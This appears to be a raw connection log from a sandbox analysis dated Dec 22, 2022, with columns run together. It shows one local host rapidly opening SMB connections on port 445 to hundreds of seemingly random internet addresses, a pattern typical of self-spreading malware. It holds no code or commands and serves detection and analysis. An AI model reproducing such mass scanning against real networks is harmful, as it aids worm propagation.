                                                        Dec 22, 2022 10:05:52.872188091 CET49701443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:05:52.874226093 CET52166445192.168.2.5113.171.166.40
                                                        Dec 22, 2022 10:05:52.874270916 CET52167445192.168.2.5117.227.97.133
                                                        Dec 22, 2022 10:05:52.874351978 CET52168445192.168.2.590.67.147.56
                                                        Dec 22, 2022 10:05:52.875406981 CET52169445192.168.2.579.215.186.149
                                                        Dec 22, 2022 10:05:52.889775991 CET52172445192.168.2.5214.135.93.60
                                                        Dec 22, 2022 10:05:52.901921988 CET4434970120.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:05:52.904659033 CET52135445192.168.2.541.203.13.45
                                                        Dec 22, 2022 10:05:52.936525106 CET52173445192.168.2.571.205.171.251
                                                        Dec 22, 2022 10:05:52.936888933 CET52174445192.168.2.5100.133.9.241
                                                        Dec 22, 2022 10:05:52.937125921 CET52175445192.168.2.593.185.73.217
                                                        Dec 22, 2022 10:05:52.951484919 CET49701443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:05:52.993455887 CET44552161159.182.6.101192.168.2.5
                                                        Dec 22, 2022 10:05:53.098474979 CET4455213541.203.13.45192.168.2.5
                                                        Dec 22, 2022 10:05:53.108300924 CET52179445192.168.2.5162.25.90.52
                                                        Dec 22, 2022 10:05:53.108489990 CET52180445192.168.2.559.43.57.123
                                                        Dec 22, 2022 10:05:53.233592033 CET52182445192.168.2.5104.218.101.203
                                                        Dec 22, 2022 10:05:53.280152082 CET52184445192.168.2.541.203.13.46
                                                        Dec 22, 2022 10:05:53.474126101 CET4455218441.203.13.46192.168.2.5
                                                        Dec 22, 2022 10:05:53.498492002 CET52161445192.168.2.5159.182.6.101
                                                        Dec 22, 2022 10:05:53.561273098 CET52188445192.168.2.523.88.66.17
                                                        Dec 22, 2022 10:05:53.584619999 CET4455218823.88.66.17192.168.2.5
                                                        Dec 22, 2022 10:05:53.631061077 CET44552161159.182.6.101192.168.2.5
                                                        Dec 22, 2022 10:05:53.702208996 CET52193445192.168.2.589.30.162.208
                                                        Dec 22, 2022 10:05:53.702214956 CET52194445192.168.2.5220.142.63.225
                                                        Dec 22, 2022 10:05:53.968319893 CET52198445192.168.2.52.253.37.159
                                                        Dec 22, 2022 10:05:53.968322039 CET52199445192.168.2.517.165.41.136
                                                        Dec 22, 2022 10:05:53.968475103 CET52200445192.168.2.514.142.198.226
                                                        Dec 22, 2022 10:05:53.968877077 CET52202445192.168.2.536.232.14.48
                                                        Dec 22, 2022 10:05:53.969024897 CET52203445192.168.2.5210.113.109.249
                                                        Dec 22, 2022 10:05:53.969182968 CET52204445192.168.2.5158.65.250.83
                                                        Dec 22, 2022 10:05:53.969453096 CET52205445192.168.2.575.149.40.201
                                                        Dec 22, 2022 10:05:53.970755100 CET52206445192.168.2.5103.100.113.82
                                                        Dec 22, 2022 10:05:53.971005917 CET52207445192.168.2.5181.143.33.140
                                                        Dec 22, 2022 10:05:53.971287966 CET52208445192.168.2.594.212.17.204
                                                        Dec 22, 2022 10:05:53.971412897 CET52209445192.168.2.5180.253.132.66
                                                        Dec 22, 2022 10:05:53.971540928 CET52210445192.168.2.5202.164.131.100
                                                        Dec 22, 2022 10:05:53.978818893 CET52211445192.168.2.5133.2.26.148
                                                        Dec 22, 2022 10:05:53.979042053 CET52212445192.168.2.582.64.183.222
                                                        Dec 22, 2022 10:05:53.979541063 CET52213445192.168.2.541.135.223.21
                                                        Dec 22, 2022 10:05:53.980130911 CET52214445192.168.2.536.22.6.106
                                                        Dec 22, 2022 10:05:53.982897997 CET52184445192.168.2.541.203.13.46
                                                        Dec 22, 2022 10:05:53.984955072 CET52215445192.168.2.539.96.212.236
                                                        Dec 22, 2022 10:05:53.985068083 CET52217445192.168.2.5208.124.221.56
                                                        Dec 22, 2022 10:05:53.985095024 CET52218445192.168.2.598.38.136.204
                                                        Dec 22, 2022 10:05:53.991724014 CET52216445192.168.2.5196.9.14.108
                                                        Dec 22, 2022 10:05:53.999497890 CET52221445192.168.2.59.158.111.132
                                                        Dec 22, 2022 10:05:54.045708895 CET52222445192.168.2.5123.252.96.171
                                                        Dec 22, 2022 10:05:54.045830965 CET52223445192.168.2.5187.21.143.137
                                                        Dec 22, 2022 10:05:54.045926094 CET52224445192.168.2.5180.131.121.195
                                                        Dec 22, 2022 10:05:54.092293978 CET52188445192.168.2.523.88.66.17
                                                        Dec 22, 2022 10:05:54.118098974 CET4455218823.88.66.17192.168.2.5
                                                        Dec 22, 2022 10:05:54.172262907 CET44552209180.253.132.66192.168.2.5
                                                        Dec 22, 2022 10:05:54.176680088 CET4455218441.203.13.46192.168.2.5
                                                        Dec 22, 2022 10:05:54.233503103 CET52228445192.168.2.5209.156.245.224
                                                        Dec 22, 2022 10:05:54.233671904 CET52229445192.168.2.541.4.48.143
                                                        Dec 22, 2022 10:05:54.342891932 CET52232445192.168.2.5120.124.150.170
                                                        Dec 22, 2022 10:05:54.342993021 CET52233445192.168.2.541.203.13.47
                                                        Dec 22, 2022 10:05:54.686089039 CET52209445192.168.2.5180.253.132.66
                                                        Dec 22, 2022 10:05:54.686532974 CET52237445192.168.2.582.62.45.240
                                                        Dec 22, 2022 10:05:54.811623096 CET52242445192.168.2.5181.246.105.20
                                                        Dec 22, 2022 10:05:54.811785936 CET52243445192.168.2.595.55.41.251
                                                        Dec 22, 2022 10:05:54.885509968 CET44552209180.253.132.66192.168.2.5
                                                        Dec 22, 2022 10:05:55.077105045 CET52248445192.168.2.5162.25.238.146
                                                        Dec 22, 2022 10:05:55.077308893 CET52247445192.168.2.581.83.239.73
                                                        Dec 22, 2022 10:05:55.077353954 CET52250445192.168.2.543.121.243.42
                                                        Dec 22, 2022 10:05:55.077438116 CET52251445192.168.2.5170.173.97.167
                                                        Dec 22, 2022 10:05:55.077500105 CET52252445192.168.2.512.175.133.50
                                                        Dec 22, 2022 10:05:55.077599049 CET52253445192.168.2.5192.26.60.38
                                                        Dec 22, 2022 10:05:55.077692032 CET52254445192.168.2.5207.193.245.93
                                                        Dec 22, 2022 10:05:55.077709913 CET52255445192.168.2.5186.152.213.42
                                                        Dec 22, 2022 10:05:55.077864885 CET52257445192.168.2.5194.243.144.125
                                                        Dec 22, 2022 10:05:55.077924967 CET52256445192.168.2.5155.100.133.233
                                                        Dec 22, 2022 10:05:55.077950954 CET52258445192.168.2.5119.204.58.110
                                                        Dec 22, 2022 10:05:55.078011036 CET52259445192.168.2.541.54.142.14
                                                        Dec 22, 2022 10:05:55.078073025 CET52260445192.168.2.5215.125.105.136
                                                        Dec 22, 2022 10:05:55.078174114 CET52261445192.168.2.5124.50.207.20
                                                        Dec 22, 2022 10:05:55.079031944 CET52262445192.168.2.566.177.4.18
                                                        Dec 22, 2022 10:05:55.079061031 CET52263445192.168.2.515.207.166.153
                                                        Dec 22, 2022 10:05:55.109880924 CET52266445192.168.2.572.45.87.58
                                                        Dec 22, 2022 10:05:55.110863924 CET52267445192.168.2.5147.40.63.227
                                                        Dec 22, 2022 10:05:55.112456083 CET52268445192.168.2.549.97.66.168
                                                        Dec 22, 2022 10:05:55.113401890 CET52269445192.168.2.5143.48.92.12
                                                        Dec 22, 2022 10:05:55.113450050 CET52270445192.168.2.5141.83.129.24
                                                        Dec 22, 2022 10:05:55.156438112 CET52271445192.168.2.5137.162.211.134
                                                        Dec 22, 2022 10:05:55.156887054 CET52272445192.168.2.5180.104.164.180
                                                        Dec 22, 2022 10:05:55.157207012 CET52273445192.168.2.5181.7.189.154
                                                        Dec 22, 2022 10:05:55.226902962 CET44552256155.100.133.233192.168.2.5
                                                        Dec 22, 2022 10:05:55.227015018 CET52256445192.168.2.5155.100.133.233
                                                        Dec 22, 2022 10:05:55.227534056 CET52275445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:55.358608961 CET52279445192.168.2.5209.223.221.164
                                                        Dec 22, 2022 10:05:55.358763933 CET52280445192.168.2.5146.11.57.12
                                                        Dec 22, 2022 10:05:55.376583099 CET44552275155.100.133.1192.168.2.5
                                                        Dec 22, 2022 10:05:55.376743078 CET52275445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:55.377410889 CET52281445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:55.405158997 CET52283445192.168.2.541.203.13.48
                                                        Dec 22, 2022 10:05:55.452267885 CET52284445192.168.2.587.7.150.216
                                                        Dec 22, 2022 10:05:55.526216984 CET44552281155.100.133.1192.168.2.5
                                                        Dec 22, 2022 10:05:55.526335955 CET52281445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:55.670522928 CET52256445192.168.2.5155.100.133.233
                                                        Dec 22, 2022 10:05:55.812670946 CET52289445192.168.2.528.109.234.183
                                                        Dec 22, 2022 10:05:55.842379093 CET52275445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:55.921267033 CET52294445192.168.2.589.209.173.153
                                                        Dec 22, 2022 10:05:55.921492100 CET52295445192.168.2.579.131.125.226
                                                        Dec 22, 2022 10:05:55.967468977 CET52281445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:56.092547894 CET52256445192.168.2.5155.100.133.233
                                                        Dec 22, 2022 10:05:56.186494112 CET52299445192.168.2.5175.64.230.32
                                                        Dec 22, 2022 10:05:56.186798096 CET52300445192.168.2.5110.67.24.221
                                                        Dec 22, 2022 10:05:56.186908960 CET52301445192.168.2.5114.49.127.193
                                                        Dec 22, 2022 10:05:56.187107086 CET52302445192.168.2.5153.78.251.199
                                                        Dec 22, 2022 10:05:56.187223911 CET52304445192.168.2.5106.163.155.249
                                                        Dec 22, 2022 10:05:56.187335014 CET52305445192.168.2.5134.127.249.95
                                                        Dec 22, 2022 10:05:56.187479019 CET52307445192.168.2.5211.118.24.237
                                                        Dec 22, 2022 10:05:56.187488079 CET52306445192.168.2.517.60.90.13
                                                        Dec 22, 2022 10:05:56.187546968 CET52308445192.168.2.5183.210.21.36
                                                        Dec 22, 2022 10:05:56.187566996 CET52309445192.168.2.533.74.111.250
                                                        Dec 22, 2022 10:05:56.187654972 CET52310445192.168.2.568.116.88.120
                                                        Dec 22, 2022 10:05:56.187799931 CET52312445192.168.2.5152.70.164.164
                                                        Dec 22, 2022 10:05:56.187800884 CET52311445192.168.2.5150.223.2.196
                                                        Dec 22, 2022 10:05:56.188153982 CET52313445192.168.2.5222.185.209.49
                                                        Dec 22, 2022 10:05:56.188216925 CET52314445192.168.2.5172.99.156.31
                                                        Dec 22, 2022 10:05:56.218578100 CET52315445192.168.2.5103.112.183.99
                                                        Dec 22, 2022 10:05:56.219861031 CET52318445192.168.2.5125.248.161.137
                                                        Dec 22, 2022 10:05:56.220731974 CET52319445192.168.2.5173.39.233.208
                                                        Dec 22, 2022 10:05:56.221740007 CET52320445192.168.2.5180.241.25.129
                                                        Dec 22, 2022 10:05:56.222639084 CET52321445192.168.2.5216.124.196.129
                                                        Dec 22, 2022 10:05:56.279917002 CET52275445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:56.280288935 CET52322445192.168.2.572.141.236.68
                                                        Dec 22, 2022 10:05:56.280472040 CET52323445192.168.2.527.159.165.163
                                                        Dec 22, 2022 10:05:56.280482054 CET52325445192.168.2.592.91.157.142
                                                        Dec 22, 2022 10:05:56.404985905 CET52281445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:56.468216896 CET52328445192.168.2.541.203.13.49
                                                        Dec 22, 2022 10:05:56.487893105 CET52329445192.168.2.5183.86.155.85
                                                        Dec 22, 2022 10:05:56.487962961 CET52330445192.168.2.593.179.21.89
                                                        Dec 22, 2022 10:05:56.562374115 CET52334445192.168.2.5187.222.106.152
                                                        Dec 22, 2022 10:05:56.937001944 CET52338445192.168.2.5121.63.215.242
                                                        Dec 22, 2022 10:05:56.983170986 CET52256445192.168.2.5155.100.133.233
                                                        Dec 22, 2022 10:05:57.046715975 CET52343445192.168.2.5125.185.58.104
                                                        Dec 22, 2022 10:05:57.046917915 CET52344445192.168.2.526.77.249.149
                                                        Dec 22, 2022 10:05:57.201894045 CET52275445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:57.311275005 CET52281445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:57.311917067 CET52349445192.168.2.5165.197.42.253
                                                        Dec 22, 2022 10:05:57.311923981 CET52350445192.168.2.5116.2.27.212
                                                        Dec 22, 2022 10:05:57.312637091 CET52351445192.168.2.5159.247.181.175
                                                        Dec 22, 2022 10:05:57.312843084 CET52352445192.168.2.5190.24.93.89
                                                        Dec 22, 2022 10:05:57.313024998 CET52353445192.168.2.557.205.16.102
                                                        Dec 22, 2022 10:05:57.313256979 CET52355445192.168.2.534.55.109.194
                                                        Dec 22, 2022 10:05:57.313366890 CET52356445192.168.2.5160.127.48.107
                                                        Dec 22, 2022 10:05:57.313477993 CET52357445192.168.2.556.67.171.95
                                                        Dec 22, 2022 10:05:57.313657999 CET52358445192.168.2.5197.7.76.180
                                                        Dec 22, 2022 10:05:57.313878059 CET52359445192.168.2.5202.197.37.158
                                                        Dec 22, 2022 10:05:57.313966990 CET52360445192.168.2.5152.58.209.160
                                                        Dec 22, 2022 10:05:57.314074993 CET52361445192.168.2.5177.217.248.197
                                                        Dec 22, 2022 10:05:57.314666986 CET52362445192.168.2.5104.110.97.183
                                                        Dec 22, 2022 10:05:57.314852953 CET52363445192.168.2.5120.8.91.55
                                                        Dec 22, 2022 10:05:57.314996958 CET52364445192.168.2.539.85.148.237
                                                        Dec 22, 2022 10:05:57.344870090 CET52367445192.168.2.5183.185.174.31
                                                        Dec 22, 2022 10:05:57.345082045 CET52368445192.168.2.590.179.207.52
                                                        Dec 22, 2022 10:05:57.345323086 CET52369445192.168.2.5223.40.172.104
                                                        Dec 22, 2022 10:05:57.345391989 CET52370445192.168.2.548.117.176.144
                                                        Dec 22, 2022 10:05:57.345494986 CET52371445192.168.2.5115.176.66.168
                                                        Dec 22, 2022 10:05:57.405730009 CET52372445192.168.2.5188.217.231.42
                                                        Dec 22, 2022 10:05:57.406100988 CET52373445192.168.2.517.21.104.58
                                                        Dec 22, 2022 10:05:57.406250954 CET52374445192.168.2.5200.93.221.24
                                                        Dec 22, 2022 10:05:57.530308962 CET52376445192.168.2.541.203.13.50
                                                        Dec 22, 2022 10:05:57.608953953 CET52380445192.168.2.5186.129.39.84
                                                        Dec 22, 2022 10:05:57.609343052 CET52381445192.168.2.5168.244.21.254
                                                        Dec 22, 2022 10:05:57.670979023 CET52383445192.168.2.528.115.44.46
                                                        Dec 22, 2022 10:05:57.720413923 CET4455237641.203.13.50192.168.2.5
                                                        Dec 22, 2022 10:05:57.720611095 CET52376445192.168.2.541.203.13.50
                                                        Dec 22, 2022 10:05:57.720879078 CET52376445192.168.2.541.203.13.50
                                                        Dec 22, 2022 10:05:57.725049019 CET52385445192.168.2.541.203.13.50
                                                        Dec 22, 2022 10:05:57.910593033 CET4455237641.203.13.50192.168.2.5
                                                        Dec 22, 2022 10:05:57.910635948 CET4455237641.203.13.50192.168.2.5
                                                        Dec 22, 2022 10:05:57.910656929 CET4455238541.203.13.50192.168.2.5
                                                        Dec 22, 2022 10:05:57.910779953 CET52385445192.168.2.541.203.13.50
                                                        Dec 22, 2022 10:05:57.910840034 CET52385445192.168.2.541.203.13.50
                                                        Dec 22, 2022 10:05:58.046273947 CET52389445192.168.2.527.240.158.170
                                                        Dec 22, 2022 10:05:58.096534967 CET4455238541.203.13.50192.168.2.5
                                                        Dec 22, 2022 10:05:58.155793905 CET52394445192.168.2.5193.16.28.169
                                                        Dec 22, 2022 10:05:58.155968904 CET52395445192.168.2.597.149.19.146
                                                        Dec 22, 2022 10:05:58.421082973 CET52400445192.168.2.5168.247.14.166
                                                        Dec 22, 2022 10:05:58.421353102 CET52401445192.168.2.569.3.27.212
                                                        Dec 22, 2022 10:05:58.421570063 CET52403445192.168.2.5193.240.152.10
                                                        Dec 22, 2022 10:05:58.421570063 CET52402445192.168.2.57.205.38.238
                                                        Dec 22, 2022 10:05:58.421705008 CET52404445192.168.2.544.31.208.69
                                                        Dec 22, 2022 10:05:58.421828032 CET52406445192.168.2.5198.126.89.77
                                                        Dec 22, 2022 10:05:58.421945095 CET52408445192.168.2.510.195.30.151
                                                        Dec 22, 2022 10:05:58.421947002 CET52407445192.168.2.5158.232.104.21
                                                        Dec 22, 2022 10:05:58.421979904 CET52409445192.168.2.555.227.92.37
                                                        Dec 22, 2022 10:05:58.422065020 CET52410445192.168.2.530.56.248.167
                                                        Dec 22, 2022 10:05:58.422204971 CET52411445192.168.2.525.190.7.105
                                                        Dec 22, 2022 10:05:58.422441006 CET52413445192.168.2.5134.93.233.199
                                                        Dec 22, 2022 10:05:58.422513962 CET52412445192.168.2.538.35.118.147
                                                        Dec 22, 2022 10:05:58.422676086 CET52414445192.168.2.5210.245.159.2
                                                        Dec 22, 2022 10:05:58.422782898 CET52415445192.168.2.5213.151.163.163
                                                        Dec 22, 2022 10:05:58.453761101 CET52418445192.168.2.534.65.155.146
                                                        Dec 22, 2022 10:05:58.454652071 CET52419445192.168.2.553.134.222.54
                                                        Dec 22, 2022 10:05:58.455705881 CET52420445192.168.2.5200.64.58.228
                                                        Dec 22, 2022 10:05:58.456665993 CET52421445192.168.2.5215.164.81.69
                                                        Dec 22, 2022 10:05:58.457406998 CET52422445192.168.2.5164.6.76.95
                                                        Dec 22, 2022 10:05:58.515665054 CET52424445192.168.2.5169.221.173.55
                                                        Dec 22, 2022 10:05:58.515788078 CET52425445192.168.2.546.242.75.189
                                                        Dec 22, 2022 10:05:58.515945911 CET52426445192.168.2.569.138.240.37
                                                        Dec 22, 2022 10:05:58.596287966 CET4455241238.35.118.147192.168.2.5
                                                        Dec 22, 2022 10:05:58.596858025 CET52412445192.168.2.538.35.118.147
                                                        Dec 22, 2022 10:05:58.596858025 CET52412445192.168.2.538.35.118.147
                                                        Dec 22, 2022 10:05:58.597256899 CET52427445192.168.2.538.35.118.1
                                                        Dec 22, 2022 10:05:58.718523026 CET52432445192.168.2.5200.153.196.86
                                                        Dec 22, 2022 10:05:58.748944998 CET52256445192.168.2.5155.100.133.233
                                                        Dec 22, 2022 10:05:58.770859003 CET4455241238.35.118.147192.168.2.5
                                                        Dec 22, 2022 10:05:58.770891905 CET4455241238.35.118.147192.168.2.5
                                                        Dec 22, 2022 10:05:58.781117916 CET52435445192.168.2.5109.21.165.64
                                                        Dec 22, 2022 10:05:59.045886040 CET52275445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:59.108377934 CET52281445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:05:59.186662912 CET52440445192.168.2.592.219.86.89
                                                        Dec 22, 2022 10:05:59.285909891 CET52445445192.168.2.5133.43.253.19
                                                        Dec 22, 2022 10:05:59.286027908 CET52446445192.168.2.5168.205.186.207
                                                        Dec 22, 2022 10:05:59.530720949 CET52452445192.168.2.592.230.221.194
                                                        Dec 22, 2022 10:05:59.530755043 CET52451445192.168.2.593.146.76.48
                                                        Dec 22, 2022 10:05:59.530874014 CET52453445192.168.2.5128.186.215.93
                                                        Dec 22, 2022 10:05:59.530903101 CET52454445192.168.2.540.104.27.23
                                                        Dec 22, 2022 10:05:59.531155109 CET52456445192.168.2.5212.155.109.41
                                                        Dec 22, 2022 10:05:59.531155109 CET52455445192.168.2.5121.203.96.164
                                                        Dec 22, 2022 10:05:59.531176090 CET52457445192.168.2.5178.99.24.247
                                                        Dec 22, 2022 10:05:59.531299114 CET52458445192.168.2.545.138.239.92
                                                        Dec 22, 2022 10:05:59.531346083 CET52459445192.168.2.538.170.15.8
                                                        Dec 22, 2022 10:05:59.531461000 CET52461445192.168.2.5140.24.110.123
                                                        Dec 22, 2022 10:05:59.531598091 CET52462445192.168.2.5166.195.178.168
                                                        Dec 22, 2022 10:05:59.531708002 CET52463445192.168.2.5145.216.167.145
                                                        Dec 22, 2022 10:05:59.531831026 CET52464445192.168.2.544.179.105.116
                                                        Dec 22, 2022 10:05:59.532049894 CET52465445192.168.2.5144.39.124.54
                                                        Dec 22, 2022 10:05:59.561487913 CET51658445192.168.2.584.7.167.138
                                                        Dec 22, 2022 10:05:59.578907013 CET52466445192.168.2.587.138.29.92
                                                        Dec 22, 2022 10:05:59.579835892 CET52467445192.168.2.5204.229.209.45
                                                        Dec 22, 2022 10:05:59.580748081 CET52468445192.168.2.5149.143.47.165
                                                        Dec 22, 2022 10:05:59.581639051 CET52469445192.168.2.572.117.171.182
                                                        Dec 22, 2022 10:05:59.582546949 CET52470445192.168.2.557.104.3.155
                                                        Dec 22, 2022 10:05:59.607171059 CET51667445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:59.625111103 CET52474445192.168.2.513.243.14.40
                                                        Dec 22, 2022 10:05:59.625246048 CET52475445192.168.2.572.37.217.100
                                                        Dec 22, 2022 10:05:59.625427008 CET52476445192.168.2.511.27.71.214
                                                        Dec 22, 2022 10:05:59.656430006 CET52477445192.168.2.538.35.118.2
                                                        Dec 22, 2022 10:05:59.837114096 CET4455247738.35.118.2192.168.2.5
                                                        Dec 22, 2022 10:05:59.837274075 CET52477445192.168.2.538.35.118.2
                                                        Dec 22, 2022 10:05:59.837510109 CET52477445192.168.2.538.35.118.2
                                                        Dec 22, 2022 10:05:59.838076115 CET52480445192.168.2.538.35.118.2
                                                        Dec 22, 2022 10:05:59.849246025 CET52482445192.168.2.5147.81.102.202
                                                        Dec 22, 2022 10:05:59.849360943 CET52483445192.168.2.5138.248.9.50
                                                        Dec 22, 2022 10:05:59.906040907 CET52486445192.168.2.5171.170.99.87
                                                        Dec 22, 2022 10:06:00.010932922 CET4455248038.35.118.2192.168.2.5
                                                        Dec 22, 2022 10:06:00.011347055 CET52480445192.168.2.538.35.118.2
                                                        Dec 22, 2022 10:06:00.011478901 CET52480445192.168.2.538.35.118.2
                                                        Dec 22, 2022 10:06:00.019062996 CET4455247738.35.118.2192.168.2.5
                                                        Dec 22, 2022 10:06:00.019104958 CET4455247738.35.118.2192.168.2.5
                                                        Dec 22, 2022 10:06:00.183423996 CET4455248038.35.118.2192.168.2.5
                                                        Dec 22, 2022 10:06:00.183612108 CET52480445192.168.2.538.35.118.2
                                                        Dec 22, 2022 10:06:00.296324015 CET52490445192.168.2.561.120.182.2
                                                        Dec 22, 2022 10:06:00.355295897 CET4455248038.35.118.2192.168.2.5
                                                        Dec 22, 2022 10:06:00.355926991 CET52480445192.168.2.538.35.118.2
                                                        Dec 22, 2022 10:06:00.405735016 CET52496445192.168.2.5210.16.20.105
                                                        Dec 22, 2022 10:06:00.405853987 CET52497445192.168.2.5180.175.129.131
                                                        Dec 22, 2022 10:06:00.527415991 CET4455248038.35.118.2192.168.2.5
                                                        Dec 22, 2022 10:06:00.641210079 CET52502445192.168.2.5142.59.194.89
                                                        Dec 22, 2022 10:06:00.641340971 CET52503445192.168.2.514.199.240.67
                                                        Dec 22, 2022 10:06:00.641541004 CET52504445192.168.2.528.74.247.128
                                                        Dec 22, 2022 10:06:00.641592979 CET52505445192.168.2.554.225.27.167
                                                        Dec 22, 2022 10:06:00.641675949 CET52506445192.168.2.5159.107.48.103
                                                        Dec 22, 2022 10:06:00.641777992 CET52507445192.168.2.543.238.59.209
                                                        Dec 22, 2022 10:06:00.641881943 CET52508445192.168.2.5158.229.8.75
                                                        Dec 22, 2022 10:06:00.641957998 CET52509445192.168.2.521.36.172.125
                                                        Dec 22, 2022 10:06:00.642049074 CET52510445192.168.2.5166.250.71.108
                                                        Dec 22, 2022 10:06:00.642215014 CET52512445192.168.2.5173.245.211.46
                                                        Dec 22, 2022 10:06:00.642388105 CET52513445192.168.2.5198.95.243.117
                                                        Dec 22, 2022 10:06:00.642507076 CET52514445192.168.2.5157.89.32.109
                                                        Dec 22, 2022 10:06:00.642644882 CET52515445192.168.2.568.250.246.151
                                                        Dec 22, 2022 10:06:00.643121004 CET52516445192.168.2.521.151.68.60
                                                        Dec 22, 2022 10:06:00.670541048 CET804970393.184.220.29192.168.2.5
                                                        Dec 22, 2022 10:06:00.670620918 CET4970380192.168.2.593.184.220.29
                                                        Dec 22, 2022 10:06:00.703464985 CET52517445192.168.2.528.110.97.99
                                                        Dec 22, 2022 10:06:00.704289913 CET52518445192.168.2.5163.15.201.30
                                                        Dec 22, 2022 10:06:00.705172062 CET52519445192.168.2.598.209.216.241
                                                        Dec 22, 2022 10:06:00.706052065 CET52520445192.168.2.517.144.136.152
                                                        Dec 22, 2022 10:06:00.706888914 CET52521445192.168.2.528.163.31.253
                                                        Dec 22, 2022 10:06:00.749927044 CET52524445192.168.2.552.89.14.204
                                                        Dec 22, 2022 10:06:00.750062943 CET52525445192.168.2.5185.146.104.24
                                                        Dec 22, 2022 10:06:00.750484943 CET52527445192.168.2.5174.122.167.84
                                                        Dec 22, 2022 10:06:00.972085953 CET52531445192.168.2.588.201.199.196
                                                        Dec 22, 2022 10:06:00.972244978 CET52532445192.168.2.554.53.114.136
                                                        Dec 22, 2022 10:06:01.015466928 CET52535445192.168.2.5124.128.222.90
                                                        Dec 22, 2022 10:06:01.109411001 CET52536445192.168.2.541.203.13.50
                                                        Dec 22, 2022 10:06:01.294908047 CET4455253641.203.13.50192.168.2.5
                                                        Dec 22, 2022 10:06:01.295185089 CET52536445192.168.2.541.203.13.50
                                                        Dec 22, 2022 10:06:01.295259953 CET52536445192.168.2.541.203.13.50
                                                        Dec 22, 2022 10:06:01.406323910 CET52543445192.168.2.5139.85.138.16
                                                        Dec 22, 2022 10:06:01.480547905 CET4455253641.203.13.50192.168.2.5
                                                        Dec 22, 2022 10:06:01.521801949 CET52547445192.168.2.5111.77.198.130
                                                        Dec 22, 2022 10:06:01.522526979 CET52548445192.168.2.566.200.218.109
                                                        Dec 22, 2022 10:06:01.572309017 CET52549445192.168.2.541.203.13.51
                                                        Dec 22, 2022 10:06:01.758044004 CET4455254941.203.13.51192.168.2.5
                                                        Dec 22, 2022 10:06:01.760031939 CET52549445192.168.2.541.203.13.51
                                                        Dec 22, 2022 10:06:01.760341883 CET52549445192.168.2.541.203.13.51
                                                        Dec 22, 2022 10:06:01.761234045 CET52554445192.168.2.541.203.13.51
                                                        Dec 22, 2022 10:06:01.765285015 CET52555445192.168.2.5150.61.81.27
                                                        Dec 22, 2022 10:06:01.765732050 CET52556445192.168.2.526.127.52.2
                                                        Dec 22, 2022 10:06:01.766232967 CET52557445192.168.2.5210.64.60.38
                                                        Dec 22, 2022 10:06:01.766350985 CET52558445192.168.2.5158.12.95.113
                                                        Dec 22, 2022 10:06:01.766501904 CET52559445192.168.2.5134.0.21.64
                                                        Dec 22, 2022 10:06:01.766587973 CET52560445192.168.2.530.166.17.96
                                                        Dec 22, 2022 10:06:01.766625881 CET52561445192.168.2.5143.216.204.244
                                                        Dec 22, 2022 10:06:01.766727924 CET52562445192.168.2.5182.22.19.202
                                                        Dec 22, 2022 10:06:01.766838074 CET52563445192.168.2.578.57.248.178
                                                        Dec 22, 2022 10:06:01.766980886 CET52565445192.168.2.574.51.177.90
                                                        Dec 22, 2022 10:06:01.767061949 CET52566445192.168.2.5168.68.36.220
                                                        Dec 22, 2022 10:06:01.767154932 CET52567445192.168.2.5202.41.26.210
                                                        Dec 22, 2022 10:06:01.767435074 CET52568445192.168.2.5221.28.8.7
                                                        Dec 22, 2022 10:06:01.767839909 CET52569445192.168.2.521.231.142.151
                                                        Dec 22, 2022 10:06:01.813257933 CET52572445192.168.2.561.85.245.223
                                                        Dec 22, 2022 10:06:01.813565016 CET52573445192.168.2.5153.36.141.62
                                                        Dec 22, 2022 10:06:01.813680887 CET52574445192.168.2.538.100.119.160
                                                        Dec 22, 2022 10:06:01.813793898 CET52575445192.168.2.594.165.113.83
                                                        Dec 22, 2022 10:06:01.813911915 CET52576445192.168.2.5101.233.158.173
                                                        Dec 22, 2022 10:06:01.859112024 CET52577445192.168.2.5209.117.73.140
                                                        Dec 22, 2022 10:06:01.859759092 CET52579445192.168.2.5145.149.56.176
                                                        Dec 22, 2022 10:06:01.860038042 CET52580445192.168.2.562.199.33.250
                                                        Dec 22, 2022 10:06:01.946012974 CET4455254941.203.13.51192.168.2.5
                                                        Dec 22, 2022 10:06:01.946084023 CET4455254941.203.13.51192.168.2.5
                                                        Dec 22, 2022 10:06:01.951092005 CET4455255441.203.13.51192.168.2.5
                                                        Dec 22, 2022 10:06:01.951350927 CET52554445192.168.2.541.203.13.51
                                                        Dec 22, 2022 10:06:01.951423883 CET52554445192.168.2.541.203.13.51
                                                        Dec 22, 2022 10:06:02.093812943 CET52585445192.168.2.5214.9.71.91
                                                        Dec 22, 2022 10:06:02.094147921 CET52586445192.168.2.530.203.249.161
                                                        Dec 22, 2022 10:06:02.141757965 CET4455255441.203.13.51192.168.2.5
                                                        Dec 22, 2022 10:06:02.146079063 CET52587445192.168.2.568.169.227.46
                                                        Dec 22, 2022 10:06:02.264970064 CET52256445192.168.2.5155.100.133.233
                                                        Dec 22, 2022 10:06:02.311733961 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:06:02.515866041 CET52595445192.168.2.5138.248.224.51
                                                        Dec 22, 2022 10:06:02.640522957 CET52599445192.168.2.575.50.24.115
                                                        Dec 22, 2022 10:06:02.640538931 CET52600445192.168.2.5213.208.96.53
                                                        Dec 22, 2022 10:06:02.686811924 CET52281445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:06:02.718122005 CET52275445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:06:02.890834093 CET52605445192.168.2.5191.123.92.34
                                                        Dec 22, 2022 10:06:02.890836000 CET52606445192.168.2.5133.102.83.101
                                                        Dec 22, 2022 10:06:02.890964031 CET52607445192.168.2.5149.150.209.181
